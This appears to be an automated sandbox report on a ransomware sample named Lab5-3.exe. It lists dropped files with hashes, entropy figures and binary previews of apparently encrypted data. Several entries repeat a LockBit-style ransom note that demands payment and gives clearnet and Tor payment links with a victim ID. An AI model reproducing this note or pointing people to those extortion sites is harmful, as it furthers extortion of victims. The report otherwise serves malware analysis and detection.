                                                                                                          Preview:-.1.6..Me...#r4N.ML&.7..."GUP.....T.:..#5..c.}....B...o..|..le.?.eL.............a...sz.....lJ.d.....h.s....P.k...(71....o.....6O.a.B+..QO.|../b....}i.....e...H.}....nZ...]z..r..L,.@...]P>..U...>...h.?.....]B...!.D.gZq.}x.+...S..#..t....&.Xx...E)..5..ho..&\.1n&t.q. =S....a......5..]......3.h7..:4@=i...4.|...\(o..ba..?$.^....n..M.3..2v~.....W.X..)..94G.C=....@8$ey...Q2=.Zrv...O..h..Ez.c..#......Z....K.6pT ...1.....b..Y..+......q>...*."..5.fX.!r.../..1...[9..k$D.5.P......C..`t..|............W`.Va.f1%h.Lw.z4Lb..."S2.)..!7z...=T.].Z. .SH.......y..D...3]S....|..i{:...5.?.%?.%@p...-...i..3..xm..Q...<..;}..W...+d.'d$!1..2.DN.1.#.......x.....Vy......z.S.IMxh.Ib..F.$B.f.?.d....Ml...r@.C~)..5.....#...D..8.$gE}.[.f;[>..h......,.cY....yj.6...d{.<.$..},..t.Ia.M...nl..]!K...r.-..,..m..CI..%...z<......Z..`..6..^.?l..P..`s."..c\Y.m..y..8.......%DRY.....1.....:....T.e..@.../.z..5..&.g.8S$.lN.z..H..v-......Z....&.w...'..G.E4Y.w.o..Bu}...!.m...J..#...\.......
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):9808
                                                                                                          Entropy (8bit):7.9788567022454835
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:192:ojA/s+c/7VmabKbmWvA4JfqSzzUyURKMtvVwcmv90Cb:brWBmSKCW3JFzwLwFtb
                                                                                                          MD5:D4DDCA1761B8937F7ABF9FA82B59557B
                                                                                                          SHA1:B0E8F14D30857F32ACDF0D37C1A91B31552A2300
                                                                                                          SHA-256:1FF64C28907985EC06ED4E0FEDE5AD30ED31AF0A41132C768FBF5113C1CD671C
                                                                                                          SHA-512:A529F7D0D9BB6E11C961394EEFCA1AE03DA702F38C628BC1247A82AC19585B9854A5C1563144347B60A061929FEF158742A601702384F2F6A2999DE0CAA1362E
                                                                                                          Malicious:false
                                                                                                          Preview:@....#b....[..V9).f...~.jk.......8......~u<...`..8X.....O8......95c....r,...............o.k...;......D.2.;..l..3.@..}6F..t........M..2r.M..C.(.1.N....c.,b.:D......}..Gg.z...\g.....j..Ba.c....(.......U+.3mY..0$1........CX.g.a.......7.v.....Z.#.\q...y.._..U..!.....+Z..S..8....X]...!v..E1....].,L%a{ro.R.)Y.o..1w.....r.6...K.&w....~..=..7..<.f.N'{.n}.~.{MD.........=X.....h...~.....%B..~d.....BH.F...f.ga.3...U..-k@..Qv..9...Y.......v..<.....(.O8../..j...X......s.g.n....p.\..A......?.D."v}....%..C]...L....d.....&.%....<*Wu.dn..'.Y..L|.....j."...r:M.F ....r.'3.u....o..'Pl.[.;.g.k+.0..[..L<.........=.uO...a..I.H,...~.k...K...b..'s.t...e...<..b.{t.m...}A";......".U..6..r.u...].........K..M<3.?..{.>aH.W.z&.E.kJ.F.g1u.g..}..Oyd.W...#.....j..z......l...........9!...'.L....A.^ ..G.....CkV.V....W.8a.jb)..m....c.2..{:H.g..Y...]....A)..Fs.Rp".J=f......~...`.^.x.!u.....@.L..5V.@.b3.1]4.%P.........X.../.4..:....eG|N....|.g.)......>...rdG`.~N.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1281
                                                                                                          Entropy (8bit):5.0109143188305945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:hXtdFjtPuy1DK6vh88waN7LnNvhv6M9wDKvDtrCAuVcHdBUi:hXltG76vDnNvs0LMAuyH1
                                                                                                          MD5:AD01B46BC788640E0B348FFCEAD87439
                                                                                                          SHA1:0663F726C339E9C5D0EEC46D274C7C2456843C01
                                                                                                          SHA-256:234AAED071BF79A99676C06B51F1D98432AD7C143C604EDC16664490EBF22E96
                                                                                                          SHA-512:B49EC5246753A9F857278235BEEA0A84667AF5DBCC8FA1295807F6D9248E0920EE45584DDDED739036C965C055AF2A67A8E435E502CF9C5115E0F913EA897F09
                                                                                                          Malicious:false
                                                                                                          Preview:All your important files are encrypted!..Any attempts to restore your files with the thrid-party software will be fatal for your files!..RESTORE YOU DATA POSIBLE ONLY BUYING private key from us...There is only one way to get your files back:....1) Through a standard browser(FireFox, Chrome, Edge, Opera)..| 1. Open link http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50..| 2. Follow the instructions on this page......2) Through a Tor Browser - recommended..| 1. Download Tor browser - https://www.torproject.org/ and install it...| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50... This link only works in Tor Browser! ..| 3. Follow the instructions on this page...... ### Attention! ###.. # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site.. # Do not rename encrypted files... # Do not try to decrypt using third party software, it may cause permanent data loss... # Decryption of your files wit
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):5120
                                                                                                          Entropy (8bit):7.959311213001621
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:96:Ugo1Vhku7DGm4lc56zZxM71bA0mniSe9bGx0uKeY2ElUJ:p6ZK656ti717/o0Cb
                                                                                                          MD5:0FCC68C863EE77C0584DC94FD56A9F16
                                                                                                          SHA1:3A88D90888F3A9A6DA4F6C1DD31BA542C91B1246
                                                                                                          SHA-256:832885C4B6AFAF0939ED1088FA22D820A026415CE814CD610FADE0BBA6A61F5B
                                                                                                          SHA-512:F3BFE16D8DA4407CC7CA7401DAB925499ACB2E213C8EAAAA146ADAF1EAD2BC9B9F8664E565C22FDB4703C94B7305AC960BBFF32EBF3925AD5E3D835C2A047CAF
                                                                                                          Malicious:false
                                                                                                          Preview:.........L.ve3k..-W2.&q.1.C<1*A.z.6b.=K....B.5...}.NH.#.....Q..cE.O..G,.U"n....+.f.(..0....D...P..="......T.u.L...~......y^.....P.%n..Ry3@.C.$q."Tu.*...f.E..M..........r...M.lm..j.+.......VK...<.3$<...H. ..Z.....`...#W~!X"v.m-.....f.*.....jcL&...6.X.X.e...T...NE..7w8....I!......g..Q.o........@d..x]IM.eU.....\.l.|.]".(...../+.D........A..."...;q..r....&..T....C.3!)(.."...aaoV5}."..X.....a.S&3h....X........[...vw....d/..HAiG....*`..CS.......<V.W..Y..{.....'y..O<...52..I..........^S....Y).6lP.........3y....].d..V.Xri|f.0.A......z]..5.kP:N {.v.............7.x....}:.#..L.......R.^...*Q..K.._..........}5.........J..O9....o...x....V....gG:..x`?<.W|..U..-.*..6...;(w.Iplo.}J{...1....9..w..K.7..p..`....d..9I.w.|.9.d.7?p_z3@.L?i...a...fHS.r......%...^+Q.....)P.;/...b.)Cdu..Fo.$fHz........... {..v..L)(@.b.u..t*.GS6..U.zblp.}...XH(.0...M.=:...e...).3.rJ<...|....5...K..W...:7e.M9.s8a....,.y.!...gu.......<..cja;g6^...2...B..:-.....1..Gy.>.....aa..{..
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):11296
                                                                                                          Entropy (8bit):7.982573452776703
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:192:qiRRWUnWn6zKnszezKS7Hg79MUdJCy7FMFsRVOPfDdirbcHsuFzyZ7DIxt2bUgXZ:VnBZKK8A79ddJCP2wfp8bcH2ZXIx8dXZ
                                                                                                          MD5:2D4B8D42EA957380FA8A8729510594FE
                                                                                                          SHA1:E66171715A0EFC0C7917932AA1050FF69635F7DB
                                                                                                          SHA-256:D5769215E8D6AD8DD977DDE1954BC2485925CA1BF23C876B26797A6DCD861173
                                                                                                          SHA-512:79FCA5AB8CAB01852E48BE247008AD1799D8690A05F16391F0A46D9A4DCFC6A9A3271998D3C37B3F387AA1EA0E188F7F52BC5ED945C1C11982C5B11E0F114A76
                                                                                                          Malicious:false
                                                                                                          Preview:.]....N...FP.q.a.E/=.G.M.F..@...q...P...I....:.qx..Dy...Xm.kjn...;..M..~]..........r.)8.>(..'."{......$Q...I...S?..........`...[.....z..DJ}6.{.p.eN.g.Y^.-.|CfC.1. .F...5..?.q..2..-X..Q.........;.N6...p...T..u.?yZ.._.......~.......X.I(V.*y.......:g..R.J.3..~.....,_N..C........~.....P.../K....a#................a.....kEY.3.....@.. .q.U7].t...).0.........s~+B..CU..U1......jK0 .{.]<N).M......{D.f..(.|W..}...$M.u..c.;...e]......!../..T.9. ..>Q......i.A\2........:.W]$...9!..2c..`[b..kKj.hb...A.H(...]...U.7...#.9..N..9.K....P....k4........f...0k.bu..^..>6.;....%......]@.g...E...pm...-....O[.w.....xx....8.$.4b.n....ju.&...ds....:..w.s..l'.8ZJ..3j!|.%k$Lf;M.W0-.F.,e.F...c.n..d` 4p.N..5..O.k..............W....n%x.2^)a)...+..~.8.^r7A'..3..=...)%~.SU..r3........\...1....q.@j....nVeI...m....uRt.L.v...E.9..o*........:C....:.i.2.`[.s.G..n`.m76S......Q.F.=p...b...r..ie.-....7.......p.......7.Wy..0:7.+.s.V.....jp........@..Z.X.1..4.}xm...!......Q.\.syv...,B...m.0
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1281
                                                                                                          Entropy (8bit):5.0109143188305945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:hXtdFjtPuy1DK6vh88waN7LnNvhv6M9wDKvDtrCAuVcHdBUi:hXltG76vDnNvs0LMAuyH1
                                                                                                          MD5:AD01B46BC788640E0B348FFCEAD87439
                                                                                                          SHA1:0663F726C339E9C5D0EEC46D274C7C2456843C01
                                                                                                          SHA-256:234AAED071BF79A99676C06B51F1D98432AD7C143C604EDC16664490EBF22E96
                                                                                                          SHA-512:B49EC5246753A9F857278235BEEA0A84667AF5DBCC8FA1295807F6D9248E0920EE45584DDDED739036C965C055AF2A67A8E435E502CF9C5115E0F913EA897F09
                                                                                                          Malicious:false
                                                                                                          Preview:All your important files are encrypted!..Any attempts to restore your files with the thrid-party software will be fatal for your files!..RESTORE YOU DATA POSIBLE ONLY BUYING private key from us...There is only one way to get your files back:....1) Through a standard browser(FireFox, Chrome, Edge, Opera)..| 1. Open link http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50..| 2. Follow the instructions on this page......2) Through a Tor Browser - recommended..| 1. Download Tor browser - https://www.torproject.org/ and install it...| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50... This link only works in Tor Browser! ..| 3. Follow the instructions on this page...... ### Attention! ###.. # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site.. # Do not rename encrypted files... # Do not try to decrypt using third party software, it may cause permanent data loss... # Decryption of your files wit
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2784
                                                                                                          Entropy (8bit):7.934714706090234
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:7mn7VIxuKvWxjQbgLhaWso4ICsOFtC3UyZtduHfUTid3hBaUoSGFcmeykEdEElUJ:iiuhZqOLsopCsOFtC3LGx0uKeY2ElUJ
                                                                                                          MD5:A83B1F2A03AD2D32F01218688911C222
                                                                                                          SHA1:A312460DF9A652E6B143BF34130EC60258ABEDB9
                                                                                                          SHA-256:2C955C20398B64E562E1553F7A6CBDF800B1A3C700480C5B68F6800C161B8898
                                                                                                          SHA-512:B177AC525891D5DE4E467E462396C8F1ED87FD4F760E5FE2F9B6DFCBA2CF00B60CB26C872E69E56A1BEB73AF870071FCBEFDB83F28F0C50675125546D3C5FF87
                                                                                                          Malicious:false
                                                                                                          Preview:._.$..d.@M.....o..W......g..xC\.Tk....Tg5.j.}.O...M...A.....n6..2b.C.e.o`.7C.j.....9....%......X,...:....{.4....F.GP..4m..^....[PB.R.'D&.yG=,<0..5...N........zj..Q.L..I*jU..K....]._.).#..:....E\(...@..}..$;...#.f `..#../(^.$.....9..>.Lh#..ST. .{.#R...W.....z..26.H/.dy..!QI2^I......IcS.P-o.%P.5.....t.e..9..N..]...1....1lmtP.a[.J....J......B.l:.p..A....Z..n.~..,"..P..7!J..M........G...L.k..F....i..&%..b./......O.h......*..A|...;.D....q.PS.R.;..%.. .pt.n.Y/....WD...=.kT.........d.....a.N..mo.pM.:.qtpjk y........P...j..7:<...BC*..g..../....?i.".).Yb.D5...._.\..9.GN.u...{...=....3*s6_O..J.......~u.p7./mae.=/..M.*.......RH.....A.D/`.@.):.~...e....N...~l.r!........o..../Z.".T.B....n.s..l..^..%...o.L..qh..\..T.%.....ZU.0.6...X]...{~.i.eS8..kK2z.3:T..$^..j.Q........!I.).TE(.....,oD.).y...:P.p`mK.)eOj.:...$...w..KC.v.....P..r....W.9G.I4d..}..3..I).\ql...F(....X.t.UU..|C..0..=......qo....n...R..Z.3.\...-.$..y....:.5..........F..~~.h)5
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):6272
                                                                                                          Entropy (8bit):7.972001978599111
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:96:CWilQTAM/HsNAqgIjcFaUEk0JT5KYfFQtTph7lmmlC1lH4Gx0uKeY2ElUJ:CwTAUMmqgIqaUn0FkYd+TLFc0Cb
                                                                                                          MD5:4AD2617DB07B498D3D150138F44538F7
                                                                                                          SHA1:32941B923A02909C57A5D59872DBF78790CDF50A
                                                                                                          SHA-256:C7587B5DA4FD3ACE59C0B7AA3B95131EA0D0A634030B3640F6DDE929C031D16C
                                                                                                          SHA-512:791172751512AA13BAF2A8CF2533D71682C3675EC82DEE2E4505E656A2D6F8933768BEACEF9184CA49FF02D9B29285E330CFAF39626BF6413FDE0770E364853C
                                                                                                          Malicious:false
                                                                                                          Preview:...[.....=^....N..MVJ.^Y8.R..\^9Cm@.V."..i..;...-G..j.^(....5.....9..1."..#.B*.,...;\...>.Ab.].....9..6.-.... Q.k..b..z.1.\...o.i...7...Le.......h.m+.t.....^.2..|....(..T.?#....s..y.{S._;3|.....P..... .....bS>......T...-.I.@8E....y..l._...Q... ....T..[...6p..6d..h..2,;.V.3B..@..09.P:}.W........n....k..&.x...Uz6.l.ZM.]....3=.G.......{KC..".=..2....w...j....YS...tl/.......b2ST?...[.B../.k......]eC..^...u....Z....%....(.Yu5...<.#|63.'.G.j.p...2 H.N]..*...<.R.....H.. RP$...9.%..s...5@^R.<&.3.?...A....c...YR...0...j.............!)._..F...9..&..!=...~tg.f.o.....[I.S../@.u...kE..\....%.'..u..uY....!/..Z.`b..J..D\G.H....q9BL0....?..\v.&6....t......r.Ty...VT..+./...:tcDaO.,1.S.:...>.kx..f....L..N.-...r.Q(.,Qw..I!Y.{.....P...#.5..PCn.R...?NH..L....pVH.J.Y...;H.Z....z..31.+`.^`.B.q.....Ho..O.....]M....h..Y.+.0|.Y....p.a.?.Bx..}aB..J.f0jX...(.....!..t.sw...."..m1.....-.#M..$...z..h.o..*K.F..~A......`....]#.....0t.3..P..T.&..B..*.....\'...h.K~.}.'4.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1281
                                                                                                          Entropy (8bit):5.0109143188305945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:hXtdFjtPuy1DK6vh88waN7LnNvhv6M9wDKvDtrCAuVcHdBUi:hXltG76vDnNvs0LMAuyH1
                                                                                                          MD5:AD01B46BC788640E0B348FFCEAD87439
                                                                                                          SHA1:0663F726C339E9C5D0EEC46D274C7C2456843C01
                                                                                                          SHA-256:234AAED071BF79A99676C06B51F1D98432AD7C143C604EDC16664490EBF22E96
                                                                                                          SHA-512:B49EC5246753A9F857278235BEEA0A84667AF5DBCC8FA1295807F6D9248E0920EE45584DDDED739036C965C055AF2A67A8E435E502CF9C5115E0F913EA897F09
                                                                                                          Malicious:false
                                                                                                          Preview:All your important files are encrypted!..Any attempts to restore your files with the thrid-party software will be fatal for your files!..RESTORE YOU DATA POSIBLE ONLY BUYING private key from us...There is only one way to get your files back:....1) Through a standard browser(FireFox, Chrome, Edge, Opera)..| 1. Open link http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50..| 2. Follow the instructions on this page......2) Through a Tor Browser - recommended..| 1. Download Tor browser - https://www.torproject.org/ and install it...| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50... This link only works in Tor Browser! ..| 3. Follow the instructions on this page...... ### Attention! ###.. # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site.. # Do not rename encrypted files... # Do not try to decrypt using third party software, it may cause permanent data loss... # Decryption of your files wit
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2240
                                                                                                          Entropy (8bit):7.930119208594905
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:TfcHc99YUys9LasRNzvbHfUTid3hBaUoSGFcmeykEdEElU92i:ICJn5NzvoGx0uKeY2ElUJ
                                                                                                          MD5:F357F9F4DA9E58B9E66EB3C8988E3FA1
                                                                                                          SHA1:5CB14B88A5F47BA7BDE9E409CEE9DCAFBFEC2385
                                                                                                          SHA-256:48165F03342C76F2A90495EF5DF2A089AB76B6EA467B1F2873535A93C7BDEA65
                                                                                                          SHA-512:3B2717DE7A889A8E5C81689EC257D7A0A9E470DCA8F9981039F1A77A3B15471332D33A1771F2236221E288F0B5C6C48ABC5BAAB0A0B42E4C57F06AEFE036B927
                                                                                                          Malicious:false
                                                                                                          Preview:Z.v..Wy(..H..l..pY.....m*.W...7./.+.*.x...,.......$.....r."H..A......N....~..}..~3..{;Y..cF...7..O.gu\C1..V.!.4.<...9..1...c2%.D...a.8..L7v.wJz...;.....6.9$.X?.H.b.h.O)......*.!]..'....ew7...y...3`.h....M..9.....#.2D...%.+.[..8j..L...V..SP..+h.......G..7.}V..Q..p ..`E._.8/SE.y..\....l.S.b-.^h5.....~.n`5:.I.....%.*....^S.o...............S.u......Bg.....&Q.qf`.JJ".H..R.K.o.y.b.....]R;.\M.......t0kV.....F.z..t5..k9..0U.M.W......./.D.9.Pz..RW.1g....k.U..4..Q-..rj?U........N..Pg).....G.X.hyr...JK...C.U.pdN.Z.z..q...W...[...6.......).....O.Z,a...!dq.y.......t.W.....,.].9...2...(.Ouh..&..m..8F&.=.E&S..'..S8..e.)<....v......e...i.Tso-3,?...W.m]...ZF^.....z....Dsj..-@....s.Vf.ad..#K..u.^..UY..3.>A....Uo..E.f4.b...5..@Zs!......\.,.|.FW.Eh.......3E.E@..'..."..V.[.R....F..'q.S....G.3...Q.k.....&q..FKJ2Zt.Wm.....T..]....oh{R......~?o.....4.3D).v...Xt...h]......s...E....z....m.._.U@..m..O..3.C.....^.Q...rp....;....M....R...=(..(ch.s:........Q.V
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2752
                                                                                                          Entropy (8bit):7.932140351896615
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:/Yuve/NO6a5npvwFuM3aA1xZNtiHfUTid3hBaUoSGFcmeykEdEElU92i:gu2/NVynpoF9qAr7Gx0uKeY2ElUJ
                                                                                                          MD5:0D29521F6046E7DE4AE09639CA4C4A8B
                                                                                                          SHA1:EC5B67824D3A8568924BAB8A6896C10CF43C548F
                                                                                                          SHA-256:38FD9A5DFF42F9728D2556C360F09328B7C4E11DA4035FEACDC73C348A363B34
                                                                                                          SHA-512:3C000A608E8AE1BBD0C1D179BEA688EBFCBD8C4FA8AEED5CAFD5674F4790FBC1D41224CB177783DDED881B7538B4227C2B26DCB05C86B07873B5C2F94F949303
                                                                                                          Malicious:false
                                                                                                          Preview:...EG.Y....x.....W..U..f.8_..[!.3:.....Uqis...y.V..P~.5.yj.mk=f.a......|BKF...zF..x....--6.J....]....:R..p..u..'......?..DpG..!.P.%oS...w.S..p.a~..`...p6I..:.o.?_..wc:..8uW.h...77_q..B.'h.u.,A.J.+.C.!43......*.7.'7$.+....E....UB.9.F...Z ....g......'\wY....d..SA........A}..VZ"...04..R~..8......U.n..I4...T.%.<Y.wX}R.C!X-.(.!....8....(`.V..J]..V.c..?D...F.T..`..4.U'.o*...eB.. .l...5....._..&k'......<.&...U.'........9...n.7SOT...;.k&..F.... .`.kz..!.B.`.1r......1....D.1...j~.........iW..+.+.<.?....!vb.......B_5....&.g_.=.....3T=..}..2(..n...{...xR..L..J. ............C.|...o.1.2*..[>...;>0.......m..A..Q`..=r..q....="......NE...x3...............=.3...z...@..BG...;.9..V,f....T..c.......l..C.{.HPj.W...>...I.2./, .s@.c6....?Idw~..B...f.:..... ..3.z....Oy..S.s..B]....).0.[..).^.RVW.GX.....H...,j./q8.K`........]_i'7.rqzf.^.,.....lfS..Ib.pF-9...26....m.ZA..........nn..W.C.f}..x..x...tZz....=.$.d..+H^..9....W...Y.mA...Q&>. ..J...z...W......z.......mK
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2000
                                                                                                          Entropy (8bit):7.895535462599048
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:J1Hbc/14svy1fO8pB2VHfUTid3hBaUoSGFcmeykEdEElU92i:J1Hboy1fO8vGx0uKeY2ElUJ
                                                                                                          MD5:722FB7B293BFA27F797BD27C649AAC2C
                                                                                                          SHA1:0D61B6BFD0ED5C0CF76841C2D5812C5C1E92CBBA
                                                                                                          SHA-256:758527663F91BD47FD619C4CE2D0B87B9C1F17108176CF6A9E2AF9A2B19DC004
                                                                                                          SHA-512:68AE216341211BE730670BFA1AEBFAFBCDE6A5AB47C69700FF66B0B96AB33D286A96178D8CE5740FFBCF50D2C8413412A65D88E31A29620B5940202A19F5CCF4
                                                                                                          Malicious:false
                                                                                                          Preview:...,e......4,.4..,....t#_.....v..p...........>.s..:.P.y%0m.....t.J...C[.w.0..#F''..i.P.}.2...>#...>....0..M...L..v...Q.....T.=.....Ge}..b.d........cd..W.0....nodt..#I.(....yi3!J.L......J..%.by~...@I.I`..nq..o-.F.`).S.e...3%.4...)|.._.#i,*U...Ex.J............~%...g.......5..<}.o...Z.F.7S.s.........@e...j......o.U9..0.,..<ctu..j~3..h.3.}a.0.Dj.........u.d.#K..../.......u...=Qb(.B.L..F..6#.Q.A.../R..b..n!...|..Z=.....xr....d......\....V..X.f..[p_41mU.}W.yf[..Q%.w.8*.......5'rO...>.....c;C..../..E.1.8.(Pa.EtW.N8#...p....q.b..*..:-.;..&.2ly...R.8.fK?v)@.........`Y.......Br.;#...`........9;..z~.)..92.....!.F.s..j02qP/h2..v..e....Z...D.....*...f".. s...M..|.....^.Q...rp....;....M....R...=(..(ch.s:........Q.V6g..>L.D.j.V.....;.$....h<P.p.....z.,r..8^P../.Hx.F...04.Ov.0&>.5P...t.,......y.....5..y3./eT..1...g....LQ.D.%Jn{...&.}...m.Y]da..........u.....r.D........<.F...`iY.+k...P..k.-.*.....67.I.,g.._Uk.h..Z........app.......B|.9.....&..H~.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:OpenPGP Secret Key
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2176
                                                                                                          Entropy (8bit):7.91177947846049
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:uae2z00Lc1bXfShjRWX3THfUTid3hBaUoSGFcmeykEdEElU92i:ne2D6S+XQGx0uKeY2ElUJ
                                                                                                          MD5:8D8B319783393418BC463B4E542BE2C0
                                                                                                          SHA1:CC00EA423DC1F701CA15E6891A4B5ABA2A45DD6E
                                                                                                          SHA-256:AFEA0F4015C880470FDD481F019EACCEB0983E9C135F18A358D28FD30AF6CFEC
                                                                                                          SHA-512:3E81E780C017DD6FDA5DC5828D05E292A19D7F125FE997E31F9CDB92D934B82A44F98F5F01FAA012A1ED868BB6FF38BBEAEDB02532411D08187CC8A2211D03E0
                                                                                                          Malicious:false
                                                                                                          Preview:.l.wR~]..O......Db..7..YRm+(p......w.....~UC..y...F.$W..K{.&..[..[`"!..../m0dA.....4"j.>!....SB6dL+../..wl.@..^D.|.,.......B..kI..T3.'.G.:i.W.|.P ....2.....~`...T:.....\.4...b_RF..U........ ._...e.zG.5...+<.N.NPV..5.u..yVk..A<......w..U....I.bik..T.C M..g._:l....18.P.%.R..3.8c*zk=C;.8?...t.)..G........d-.....V...a}...z...7.^}t.h..........i.>[%ys$-.p.s..f.o..r...).m....^}9....o..F%....+....o..N&.z.qb....._F.r........wDQL...c7.)Z_.)..cZ.O..%e^uI.4...h.g..Y.c....mN}.SF.;.n.i.2. p14....>E.s....2aIV........r3k`....4...P]....zD..h..V%y..;..f..?.m..y..m. z..i....=.}f...l.e.v..xM:e.......V...+.'5.F.hK.....H....+......._.Bu..2.r*Jv..]m_.P_z*G...i.dAs.....B.T.*..........#8....s.*.."'"<E.....0.bA.\.D|...Pi.T.w..~....+....Y....../.....m..Y..#..h)..Q..0=..%.R...]hG.&..%8.O....J....5...Yg.a.`c@.....B....3.zG../P.m.:....MA..<..k./~.!..W...^.Q...rp....;....M....R...=(..(ch.s:........Q.V6g..>L.D.j.V.....;.$....h<P.p.....z.,r..8^P../.Hx.F...04.Ov.0&
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1952
                                                                                                          Entropy (8bit):7.908737226877022
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:Oe9iHLge9cm5+EAHfUTid3hBaUoSGFcmeykEdEElU92i:UZ9T+EHGx0uKeY2ElUJ
                                                                                                          MD5:C46BD47613AB14F748E6987900B0029D
                                                                                                          SHA1:A402DD5712A0A05EEB1FF5D9CB3702F586189880
                                                                                                          SHA-256:C1829DBC05C53AA7C137FFF9FFB99985A05A04C4A61791BBEC9CDF8E591E9C01
                                                                                                          SHA-512:6C3752CA62F12BF0E737E80AB46E87C6D15D83FF2342575B7E0953AD07F7F5AE62480C51FCB3FDCC2D2EF30DA20AE6D822D73D91EF7B6ED2194E8E6653EF922C
                                                                                                          Malicious:false
                                                                                                          Preview:gJ..M....kD...}N.+o...S.P..../......48..l.=..(n..O.J&d.59^.S\.G.@SGQ.'..&.....-&D.......DF..$G....6..4.El..|....g..f...c.<....\..g.._...........N....3 .+....,...h.,..U(oR8...@.Z1...d..c.).5."..E..m.l|d...&j.._..J...C.*...]..X.D..o..CS....s.Q.I..2.......G..@6}<`...<..ZN..!..*.o..Y.N.LO.^q!W}.#.=}#3q..2..Wh..V...eG.j#.{..r..r.A%..Fm@~......8U......=..4..~..G.g.....a.&...v.U-..e.).1..7...g.e...;.}>l.]....e.{..^\^.#6..A.u.z!.O=......%.....XY"3........x.;y!....1%=X4v...Cg.c>.c.b.....=S..D..d7Av..{..Zt..8..m..........JeS?b$Ot...i..RT..m...#..uA.v1.D%.^.v...9k.K..L..Ns..d.P..B....'.. ....?...h..4..W.X.z..Q^..d.:....*.b.]=..^.Q...rp....;....M....R...=(..(ch.s:........Q.V6g..>L.D.j.V.....;.$....h<P.p.....z.,r..8^P../.Hx.F...04.Ov.0&>.5P...t.,......y.....5..y3./eT..1...g....LQ.D.%Jn{...&.}...m.Y]da..........u.....r.D........<.F...`iY.+k...P..k.-.*.....67.I.,g.._Uk.h..Z........app.......B|.9.....&..H~..T.6..?....[.~....O_2....,..H0B.Y;..6..6.z"...
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2112
                                                                                                          Entropy (8bit):7.9083287964618245
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:i7wCKfzLy5aQoMCjJg6HfUTid3hBaUoSGFcmeykEdEElU92i:TC0z2aQNCjJ+Gx0uKeY2ElUJ
                                                                                                          MD5:341BA11A9CE5F4E86AE747F8A05127B6
                                                                                                          SHA1:F3350A6D744EC477234D47FDD9184D4E5296C215
                                                                                                          SHA-256:C56D8FD38E742CC31EDDC1E9819976147647823E7F6EBAC0777D22BAC37F9D32
                                                                                                          SHA-512:0F320BDCD4586A9CF011BA519E329714DAC4E025D5B3554AA32B46C7E0132A90C3905B66A511EB492E65440746A4395597779FE8268BFA0A765081C485303C18
                                                                                                          Malicious:false
